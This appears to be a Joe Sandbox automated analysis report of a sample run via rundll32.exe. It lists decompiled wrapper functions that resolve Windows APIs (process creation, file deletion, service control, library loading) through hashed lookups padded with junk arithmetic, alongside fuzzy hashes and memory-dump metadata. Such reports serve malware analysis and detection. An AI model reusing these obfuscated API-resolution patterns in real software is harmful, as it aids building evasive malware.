ExitProcess.KERNELBASE(00000000), ref: 001F48B7

Strings

[, xrefs: 001F488B

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID: [
API String ID: 621844428-1822564810
Opcode ID: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction ID: 16d6e7736e5bd83a05d39598fdceb209443255c5151720051fd0e763d1ad046e
Opcode Fuzzy Hash: ffab03bb8b36d9f8c6ed4855f41195a310f3e0c6a27eecdabbfc4dde42890251
Instruction Fuzzy Hash: CFF01D70915309FBDB04CFE8C95699EBFB5EB40301F20818CE444B7290E3715F509B50

Uniqueness

Uniqueness Score: -1.00%

Function 00204F7D, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 66%

			E00204F7D(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t17;
				int _t24;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t17);
				_v12 = 0xddd8;
				_v12 = _v12 * 0x48;
				_v12 = _v12 ^ 0x003e66d8;
				_v8 = 0xcb35;
				_v8 = _v8 ^ 0x7b88573c;
				_v8 = _v8 * 0x59;
				_v8 = _v8 ^ 0xf27e4a21;
				E002007A9(0x6d6c237b, 0x9164b7cc, __ecx, __ecx, 0xce);
				_t24 = CloseHandle(_a4); // executed
				return _t24;
			}

0x00204f80
0x00204f81
0x00204f82
0x00204f86
0x00204f87
0x00204f8c
0x00204fa5
0x00204fa8
0x00204faf
0x00204fb6
0x00204fc7
0x00204fca
0x00204fd7
0x00204fe2
0x00204fe7

APIs

CloseHandle.KERNELBASE(003E66D8), ref: 00204FE2

Strings

{#lm, xrefs: 00204FC2

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: {#lm
API String ID: 2962429428-1564096886
Opcode ID: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction ID: 3baa9677071f580ff9ed1589da305fef3c7bc8fa5d74d7cd9fe7e1eb2b31d20e
Opcode Fuzzy Hash: b50878758ca05e8eac60d1a1146cf5201f1efae4b397f9b7fdbd1e363743abdf
Instruction Fuzzy Hash: 19F037B081120CFFEB04DFA4D98289EBFBAEB41300F208199E804AB260D3715B509B50

Uniqueness

Uniqueness Score: -1.00%

Function 0020976F, Relevance: 1.6, APIs: 1, Instructions: 63
processCOMMON

Download Yara Rule

C-Code - Quality: 21%

			E0020976F(void* __ecx, struct _PROCESS_INFORMATION* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, struct _STARTUPINFOW* _a20, int _a24, intOrPtr _a28, intOrPtr _a40, intOrPtr _a44, intOrPtr _a52, intOrPtr _a56, WCHAR* _a60, WCHAR* _a68) {
				unsigned int _v8;
				signed int _v12;
				void* _t34;
				int _t39;
				struct _PROCESS_INFORMATION* _t48;

				_push(__ecx);
				_push(__ecx);
				_t48 = __edx;
				_push(0);
				_push(_a68);
				_push(0);
				_push(_a60);
				_push(_a56);
				_push(_a52);
				_push(0);
				_push(_a44);
				_push(_a40);
				_push(0);
				_push(0);
				_push(_a28);
				_push(_a24);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t34);
				_v12 = 0xaff9;
				_v12 = _v12 | 0xcee54bd1;
				_v12 = _v12 + 0x6ed6;
				_v12 = _v12 ^ 0xcee61221;
				_v8 = 0x6229;
				_v8 = _v8 ^ 0x42aa9f31;
				_v8 = _v8 >> 2;
				_v8 = _v8 ^ 0x10aad83f;
				E002007A9(0xf0de9e9f, 0x9164b7cc, __ecx, __ecx, 0x155);
				_t39 = CreateProcessW(_a68, _a60, 0, 0, _a24, 0, 0, 0, _a20, _t48); // executed
				return _t39;
			}

0x00209772
0x00209773
0x00209778
0x0020977a
0x0020977b
0x0020977e
0x0020977f
0x00209782
0x00209785
0x00209788
0x00209789
0x0020978c
0x0020978f
0x00209790
0x00209791
0x00209794
0x00209797
0x0020979a
0x0020979d
0x002097a0
0x002097a3
0x002097a6
0x002097a7
0x002097a8
0x002097ad
0x002097b7
0x002097c3
0x002097ca
0x002097d1
0x002097d8
0x002097df
0x002097e3
0x002097fc
0x00209816
0x0020981d

APIs

CreateProcessW.KERNEL32(001F591A,?,00000000,00000000,?,00000000,00000000,00000000,?,?,?,?,?,?,?,001F591A), ref: 00209816

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction ID: e9e095bef4881a598618a2ea78be183212cec5bc99613d49aec6f9932c7d2903
Opcode Fuzzy Hash: 6869d8763d8071430bf2275e85cbffb8ce4b60d48a278036a99dc26001f63f15
Instruction Fuzzy Hash: 8A11B372901148BBDF199F96DC0ACDF7F7AEF89750F104148FA1556120D2768A60EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 001FB566, Relevance: 1.6, APIs: 1, Instructions: 55
fileCOMMON

Download Yara Rule

C-Code - Quality: 31%

			E001FB566(void* __ecx, long __edx, intOrPtr _a4, intOrPtr _a8, long _a12, intOrPtr _a16, intOrPtr _a24, intOrPtr _a28, long _a32, intOrPtr _a36, intOrPtr _a40, long _a44, WCHAR* _a48) {
				unsigned int _v8;
				signed int _v12;
				void* _t32;
				void* _t38;
				long _t47;

				_push(__ecx);
				_push(__ecx);
				_push(_a48);
				_t47 = __edx;
				_push(_a44);
				_push(_a40);
				_push(_a36);
				_push(_a32);
				_push(_a28);
				_push(_a24);
				_push(0);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(0);
				E001F602B(_t32);
				_v8 = 0xfd14;
				_v8 = _v8 >> 4;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 >> 9;
				_v8 = _v8 ^ 0x00002bef;
				_v12 = 0x4f26;
				_v12 = _v12 | 0xe7e97f76;
				_v12 = _v12 ^ 0xe7e94dbb;
				E002007A9(0xfbdf2264, 0x9164b7cc, __ecx, __ecx, 0x1bd);
				_t38 = CreateFileW(_a48, _a12, _t47, 0, _a44, _a32, 0); // executed
				return _t38;
			}

0x001fb569
0x001fb56a
0x001fb56d
0x001fb572
0x001fb574
0x001fb577
0x001fb57a
0x001fb57d
0x001fb580
0x001fb583
0x001fb586
0x001fb587
0x001fb58a
0x001fb58d
0x001fb590
0x001fb593
0x001fb594
0x001fb595
0x001fb59a
0x001fb5a4
0x001fb5b8
0x001fb5c0
0x001fb5c4
0x001fb5cb
0x001fb5d2
0x001fb5d9
0x001fb5e6
0x001fb5fd
0x001fb604

APIs

CreateFileW.KERNELBASE(00200668,?,?,00000000,?,?,00000000,?,?,?,047BBE06,00200668,?,?,?,?), ref: 001FB5FD

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction ID: 485c5e609fe2aec3bc199f0c517ab32974bb55217e71692408e913989f17a245
Opcode Fuzzy Hash: 2ad720b21a0c423b8602bfec827dffa1ac762b31964bb8a48031e4882696984a
Instruction Fuzzy Hash: 0111C372801248BBDF16DF95DD06CEE7F7AFF89314F148198FA1862160D3729A20EB50

Uniqueness

Uniqueness Score: -1.00%

Function 0020981E, Relevance: 1.5, APIs: 1, Instructions: 43
memoryCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E0020981E(long __ecx, void* __edx, long _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				void* _t22;
				void* _t28;
				void* _t34;
				long _t37;

				_push(__ecx);
				_push(__ecx);
				_push(_a16);
				_t34 = __edx;
				_t37 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E001F602B(_t22);
				_v12 = 0xe68;
				_v12 = _v12 * 0x39;
				_v12 = _v12 ^ 0xd1b1d871;
				_v12 = _v12 ^ 0xd1b2fb7e;
				_v8 = 0x629e;
				_v8 = _v8 + 0xfffff5da;
				_v8 = _v8 | 0xbef7b77b;
				_v8 = _v8 ^ 0xbef79fc3;
				E002007A9(0xd2423672, 0x9164b7cc, __ecx, __ecx, 0x1ff);
				_t28 = RtlAllocateHeap(_t34, _a4, _t37); // executed
				return _t28;
			}

0x00209821
0x00209822
0x00209825
0x00209828
0x0020982a
0x0020982c
0x0020982f
0x00209832
0x00209835
0x00209836
0x00209837
0x0020983c
0x00209855
0x00209858
0x0020985f
0x00209866
0x0020986d
0x00209874
0x0020987b
0x0020988e
0x0020989b
0x002098a2

APIs

RtlAllocateHeap.NTDLL(00000000,D1B2FB7E,00000001,?,?,?,001F87F2,0000CAAE,0000510C,AD82F196), ref: 0020989B

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction ID: 1129fbc2d41107b07c5125bba92e75e737e23df9f0a9dadb9c0d9eff1fb701ab
Opcode Fuzzy Hash: 02fa28ec4255ecfe7622b3d83f76bf8205b256d3275c7cf82a1049aea6bd8148
Instruction Fuzzy Hash: 92019A72801208FBDB04EFD5DC46CDFBF79EF85310F108188F908A6220E6715B219BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00207BF4, Relevance: 1.5, APIs: 1, Instructions: 41
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E00207BF4(struct _SHFILEOPSTRUCTW* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				void* _t24;
				int _t31;
				signed int _t33;
				struct _SHFILEOPSTRUCTW* _t40;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_t40 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t24);
				_v8 = 0xa117;
				_t33 = 0x76;
				_v8 = _v8 / _t33;
				_v8 = _v8 >> 4;
				_v8 = _v8 ^ 0x210fe703;
				_v8 = _v8 ^ 0x210fdcea;
				_v12 = 0xf1e9;
				_v12 = _v12 << 9;
				_v12 = _v12 ^ 0x01e3a445;
				E002007A9(0x6b98377a, 0xd39e34db, _t33, _t33, 0x219);
				_t31 = SHFileOperationW(_t40); // executed
				return _t31;
			}

0x00207bf7
0x00207bf8
0x00207bfa
0x00207bfd
0x00207bff
0x00207c02
0x00207c06
0x00207c07
0x00207c0f
0x00207c1d
0x00207c25
0x00207c2d
0x00207c31
0x00207c38
0x00207c3f
0x00207c46
0x00207c4a
0x00207c5e
0x00207c67
0x00207c6d

APIs

SHFileOperationW.SHELL32(68CF93E9,?,?,?,?,?,?), ref: 00207C67

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileOperation
String ID:
API String ID: 3080627654-0
Opcode ID: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction ID: 0bd237f299dba071f9f118eedf935ca560909e1e9c893418f39fac6ec27e5db5
Opcode Fuzzy Hash: ec0cacec5e68fb90f10cfb9f5f8a6d9ee760356c7ab0c34d434bb37ff5978ad8
Instruction Fuzzy Hash: 0C014FB190120CFFEB09DF94C84A9DEBBB5EF45314F208198F50567250EBB15F509B91

Uniqueness

Uniqueness Score: -1.00%

Function 001FF65F, Relevance: 1.5, APIs: 1, Instructions: 40
serviceCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E001FF65F(int __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, short* _a12, void* _a16, intOrPtr _a20) {
				unsigned int _v8;
				signed int _v12;
				void* _t24;
				void* _t29;
				int _t35;

				_push(__ecx);
				_push(__ecx);
				_push(_a20);
				_t35 = __ecx;
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t24);
				_v12 = 0xd5a7;
				_v12 = _v12 ^ 0x994cba9d;
				_v12 = _v12 ^ 0x994c19d3;
				_v8 = 0xac88;
				_v8 = _v8 << 3;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xebed;
				_v8 = _v8 ^ 0x0000ab82;
				E002007A9(0x1b506617, 0x2c3ac9a2, __ecx, __ecx, 0x18c);
				_t29 = OpenServiceW(_a16, _a12, _t35); // executed
				return _t29;
			}

0x001ff662
0x001ff663
0x001ff665
0x001ff668
0x001ff66a
0x001ff66d
0x001ff670
0x001ff673
0x001ff677
0x001ff678
0x001ff67d
0x001ff687
0x001ff693
0x001ff69a
0x001ff6a1
0x001ff6a5
0x001ff6a9
0x001ff6b0
0x001ff6c9
0x001ff6d8
0x001ff6de

APIs

OpenServiceW.ADVAPI32(BB1E804F,0000AB81,A536EF12), ref: 001FF6D8

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: OpenService
String ID:
API String ID: 3098006287-0
Opcode ID: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction ID: 0ba70dfcec261f9c2b8ba06074caf9871ca36b38ce8cbd8547282b028e6c8062
Opcode Fuzzy Hash: 6567ea87a17df60c0308b73184139fb23dc7eaa7bd850ee34e454fe5b2712021
Instruction Fuzzy Hash: FF01E5B690120CBBEF059F94DC468DF7F75EB05324F148188F90462250D6B25E21DBA1

Uniqueness

Uniqueness Score: -1.00%

Function 001FB6DD, Relevance: 1.5, APIs: 1, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E001FB6DD(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				void* _t23;
				intOrPtr* _t27;
				void* _t28;

				E001F602B(_t23);
				_v12 = 0x9431;
				_v12 = _v12 >> 7;
				_v12 = _v12 ^ 0x0000160f;
				_v8 = 0xc972;
				_v8 = _v8 ^ 0x829e0126;
				_v8 = _v8 + 0x4512;
				_v8 = _v8 + 0xffff18f9;
				_v8 = _v8 ^ 0x829e24c1;
				_t27 = E002007A9(0x6460e96, 0x9164b7cc, __ecx, __ecx, 0x114);
				_t28 =  *_t27(_a8, 0, _a16, 0x28, 0, __edx, 0x28, _a8, _a12, _a16, _a20, __ecx, __ecx); // executed
				return _t28;
			}

0x001fb6f3
0x001fb6f8
0x001fb702
0x001fb70b
0x001fb712
0x001fb719
0x001fb720
0x001fb727
0x001fb72e
0x001fb747
0x001fb759
0x001fb75e

APIs

SetFileInformationByHandle.KERNELBASE(?,00000000,?,00000028), ref: 001FB759

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: FileHandleInformation
String ID:
API String ID: 3935143524-0
Opcode ID: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction ID: b1d20f5bfc209d41f81da95ba7a171abb8ca67a26d1bf3f6441a10f7ed33f6b7
Opcode Fuzzy Hash: f3b47d937ccbfc1dfa1fb592565fa620fdcbc58eeb5ca1dc2caafddb8630e31b
Instruction Fuzzy Hash: CC018BB294030CFBEF45DF90DD06E9E7BB5EF18704F108188FA09261A0D3B25E20AB61

Uniqueness

Uniqueness Score: -1.00%

Function 0020AA3C, Relevance: 1.5, APIs: 1, Instructions: 34
fileCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0020AA3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				signed int _v8;
				unsigned int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0xcc49;
				_v12 = _v12 << 6;
				_v12 = _v12 >> 2;
				_v12 = _v12 ^ 0x000ca988;
				_v8 = 0x5d85;
				_v8 = _v8 | 0xb9d19a55;
				_v8 = _v8 * 0xd;
				_v8 = _v8 ^ 0x6fa87272;
				E002007A9(0x330b490b, 0x9164b7cc, __ecx, __ecx, 0xb9);
				_t27 = DeleteFileW(_a12); // executed
				return _t27;
			}

0x0020aa3f
0x0020aa40
0x0020aa41
0x0020aa44
0x0020aa47
0x0020aa4b
0x0020aa4c
0x0020aa51
0x0020aa5b
0x0020aa64
0x0020aa68
0x0020aa6f
0x0020aa76
0x0020aa8d
0x0020aa90
0x0020aa9d
0x0020aaa8
0x0020aaad

APIs

DeleteFileW.KERNELBASE(?,?,?,?,A6E18774,?,?), ref: 0020AAA8

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: DeleteFile
String ID:
API String ID: 4033686569-0
Opcode ID: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction ID: 47197d10c455c84a89c7741739c354172d350b13dcd5ceef6f090ec2054df0fc
Opcode Fuzzy Hash: 45dcdf6a4fffdfc3fb2b59b925c3fbc0a67555bc5588bf158da43ded6a3f2711
Instruction Fuzzy Hash: F0F069B190020CFFDF08DF94DD4A99EBFB4EB41304F108088F905A6260D3B69B649B50

Uniqueness

Uniqueness Score: -1.00%

Function 001F5FB2, Relevance: 1.5, APIs: 1, Instructions: 33
serviceCOMMON

Download Yara Rule

C-Code - Quality: 70%

			E001F5FB2(void* __ecx, void* __edx, void* _a4) {
				signed int _v8;
				signed int _v12;
				void* _t21;
				int _t27;

				_push(__ecx);
				_push(__ecx);
				_push(_a4);
				_push(__ecx);
				E001F602B(_t21);
				_v12 = 0x33d;
				_v12 = _v12 + 0xc3dc;
				_v12 = _v12 | 0x39ccfb02;
				_v12 = _v12 ^ 0x39ccf342;
				_v8 = 0xe8d9;
				_v8 = _v8 * 0x16;
				_v8 = _v8 | 0x4145347f;
				_v8 = _v8 ^ 0x9035ef96;
				_v8 = _v8 ^ 0xd1609914;
				E002007A9(0x6b3db31e, 0x2c3ac9a2, __ecx, __ecx, 0x1d5);
				_t27 = CloseServiceHandle(_a4); // executed
				return _t27;
			}

0x001f5fb5
0x001f5fb6
0x001f5fb7
0x001f5fbb
0x001f5fbc
0x001f5fc1
0x001f5fcb
0x001f5fd7
0x001f5fde
0x001f5fe5
0x001f5ffc
0x001f5fff
0x001f6006
0x001f600d
0x001f601a
0x001f6025
0x001f602a

APIs

CloseServiceHandle.ADVAPI32(39CCF342), ref: 001F6025

Memory Dump Source

Source File: 0000000B.00000002.2115003226.00000000001F1000.00000020.00000001.sdmp, Offset: 001F0000, based on PE: true

Associated: 0000000B.00000002.2114981062.00000000001F0000.00000004.00000001.sdmp Download File
Associated: 0000000B.00000002.2115042872.000000000020C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1f0000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandleService
String ID:
API String ID: 1725840886-0
Opcode ID: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction ID: 69b7a602794ff9f7d4ed518adff1221bfcb0fd5835044999a835a919fe29db3f
Opcode Fuzzy Hash: 07ec7a3e7fbf6174b9072a74acebe146c12452aee72241e4f1ccd61842b21ecb
Instruction Fuzzy Hash: ADF04FB0C1120CFFEB08DFA0E94689EBFB8EB40300F208198E509A7260E7715F159F54

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Analysis Process: rundll32.exe PID: 2452 Parent PID: 1980 rundll32.exeCOMMON

Execution Graph

Execution Coverage:	16.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	994
Total number of Limit Nodes:	14

Executed Functions

Function 006A2959, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 49
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 62%

			E006A2959(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, int _a16) {
				unsigned int _v8;
				signed int _v12;
				void* _t30;
				void* _t39;
				signed int _t41;
				signed int _t42;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(0);
				E006A602B(_t30);
				_v12 = 0x5e3c;
				_t41 = 0x63;
				_v12 = _v12 / _t41;
				_t42 = 0x2f;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x000064be;
				_v8 = 0x74da;
				_v8 = _v8 | 0xfefeeaea;
				_v8 = _v8 >> 0xc;
				_v8 = _v8 ^ 0x000fb531;
				E006B07A9(0x44082a3f, 0x2c3ac9a2, _t42, _t42, 0x18a);
				_t39 = OpenSCManagerW(0, 0, _a16); // executed
				return _t39;
			}

0x006a295f
0x006a2964
0x006a2967
0x006a296a
0x006a296d
0x006a296e
0x006a296f
0x006a2977
0x006a2985
0x006a298a
0x006a2992
0x006a299a
0x006a29a2
0x006a29a9
0x006a29b0
0x006a29b7
0x006a29bb
0x006a29cf
0x006a29dc
0x006a29e2

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,?), ref: 006A29DC

Strings

<^, xrefs: 006A2977

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: ManagerOpen
String ID: <^
API String ID: 1889721586-3203995635
Opcode ID: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction ID: e94cc8e67a865569ded364f923297bc8344425a903c986206b0046fa961e4b21
Opcode Fuzzy Hash: 65485d950964110f61f8f9941fc07d1101582776214450038a05023cc6a25d4d
Instruction Fuzzy Hash: D0018072A00108BFEB14DF95DC0A8DFBFB6EF45310F108098F508A6250D7B69F619B91

Uniqueness

Uniqueness Score: -1.00%

Function 006AC6C7, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 58%

			E006AC6C7(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				signed int _v8;
				unsigned int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _t29;
				intOrPtr* _t33;
				void* _t34;

				E006A602B(_t29);
				_v28 = 0x4fe02f;
				_v24 = 0x232390;
				_v20 = 0xf8460;
				_v16 = 0;
				_v12 = 0xf625;
				_v12 = _v12 >> 6;
				_v12 = _v12 >> 0xa;
				_v12 = _v12 + 0xffffcc6f;
				_v12 = _v12 ^ 0xffffa5b6;
				_v8 = 0xe5cd;
				_v8 = _v8 + 0xffffae4d;
				_v8 = _v8 | 0xf8bbefe7;
				_v8 = _v8 ^ 0xf8bbcc9a;
				_t33 = E006B07A9(0x59a47438, 0xd39e34db, __ecx, __ecx, 0x1e9);
				_t34 =  *_t33(0, _a16, 0, 0, _a4, __ecx, __edx, _a4, 0, _a12, _a16, _a20, 0, 0); // executed
				return _t34;
			}

0x006ac6e1
0x006ac6e6
0x006ac6f0
0x006ac6fc
0x006ac703
0x006ac706
0x006ac70d
0x006ac711
0x006ac715
0x006ac71c
0x006ac723
0x006ac72a
0x006ac731
0x006ac738
0x006ac751
0x006ac762
0x006ac768

APIs

SHGetFolderPathW.SHELL32(00000000,00232390,00000000,00000000,FFFFA5B6), ref: 006AC762

Strings

/O, xrefs: 006AC6E6

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
Associated: 0000000C.00000002.2118100865.00000000006BC000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6a0000_rundll32.jbxd

Yara matches

Similarity

API ID: FolderPath
String ID: /O
API String ID: 1514166925-1923427199
Opcode ID: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction ID: 1b23dfb3173831b408d10a28073277d6e790f4ac52bb6f488175fe6e8ac06050
Opcode Fuzzy Hash: 126e875f67a9f2879335132fa059b233a736e7d205ba747755af06be747269f3
Instruction Fuzzy Hash: B01133B290122DBBCB25DF94DD498DFBFB9EF05714F108188F90962210D7714B659BE0

Uniqueness

Uniqueness Score: -1.00%

Function 006A1000, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E006A1000(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, WCHAR* _a12) {
				unsigned int _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t33;
				struct HINSTANCE__* _t40;
				signed int _t42;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E006A602B(_t33);
				_v16 = _v16 & 0x00000000;
				_v24 = 0x1b2eda;
				_v20 = 0x33a3b7;
				_v12 = 0x98c;
				_v12 = _v12 + 0xb426;
				_v12 = _v12 + 0x5beb;
				_t42 = 0x63;
				_v12 = _v12 / _t42;
				_v12 = _v12 ^ 0x00000fce;
				_v8 = 0x120e;
				_v8 = _v8 + 0xfffffcb8;
				_v8 = _v8 + 0xffffefaa;
				_v8 = _v8 >> 5;
				_v8 = _v8 ^ 0x07ff9a02;
				E006B07A9(0xa900db79, 0x9164b7cc, _t42, _t42, 0xdd);
				_t40 = LoadLibraryW(_a12); // executed
				return _t40;
			}

0x006a1006
0x006a1009
0x006a100c
0x006a1011
0x006a1016
0x006a101d
0x006a1026
0x006a102d
0x006a1034
0x006a103b
0x006a1047
0x006a104f
0x006a1057
0x006a105e
0x006a1065
0x006a106c
0x006a1073
0x006a1077
0x006a108b
0x006a1096
0x006a109b

APIs

LoadLibraryW.KERNEL32(0033A3B7), ref: 006A1096

Strings

[, xrefs: 006A103B

Memory Dump Source

Source File: 0000000C.00000002.2118054956.00000000006A1000.00000020.00000001.sdmp, Offset: 006A0000, based on PE: true

Associated: 0000000C.00000002.2118045798.00000000006A0000.00000004.00000001.sdmp Download File
